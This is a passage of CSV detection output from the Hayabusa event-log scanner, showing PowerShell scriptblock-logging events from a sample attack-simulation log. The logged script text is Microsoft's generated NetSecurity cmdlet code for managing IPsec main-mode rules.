'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = 
[Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('CloneObject', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecMainModeRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Copy-NetIPsecMainModeRule' -Alias '*' function Enable-NetIPsecMainModeRule { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeRule')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] 
[ValidateNotNull()] [string[]] ${MainModeCryptoSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase1AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 19:19:38.215 +09:00,win10-02.offsec.lan,4104,medium,,Potentially Malicious PwSh,"ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP1AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase1AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet', Mandatory=$true, ValueFromPipeline=$true)] 
[PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEMMCryptoSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecMainModeCryptoSet}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetMainModeRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] 
[Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not 
$__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 
'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('MainModeCryptoSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${MainModeCryptoSet}) $__cmdletization_queryBuilder.FilterByProperty('MainModeCryptoSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase1AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase1AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase1AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { 
$__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetMainModeRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetMainModeRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase1AuthSet') -and (@('ByAssociatedNetIPsecPhase1AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase1AuthSet}, 'MSFT_NetMainModeRuleMMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecMainModeCryptoSet') -and (@('ByAssociatedNetIPsecMainModeCryptoSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecMainModeCryptoSet}, 'MSFT_NetMainModeRuleMMCryptoSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { 
$__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll', 'InputObject (cdxml)') -contains $_ } { $__cmdletization_returnValue = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('Enable', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { 
$__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecMainModeRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Enable-NetIPsecMainModeRule' -Alias '*' function Disable-NetIPsecMainModeRule { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeRule')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [Validate",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 19:19:38.215 +09:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,"ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet', Mandatory=$true, ValueFromPipeline=$true)] 
[PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP1AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase1AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEMMCryptoSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecMainModeCryptoSet}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] 
[PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetMainModeRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] 
[Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', 
$__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('MainModeCryptoSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${MainModeCryptoSet}) $__cmdletization_queryBuilder.FilterByProperty('MainModeCryptoSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase1AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase1AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase1AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { 
$__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetMainModeRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetMainModeRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase1AuthSet') -and (@('ByAssociatedNetIPsecPhase1AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase1AuthSet}, 'MSFT_NetMainModeRuleMMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecMainModeCryptoSet') -and (@('ByAssociatedNetIPsecMainModeCryptoSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecMainModeCryptoSet}, 'MSFT_NetMainModeRuleMMCryptoSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if 
($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch 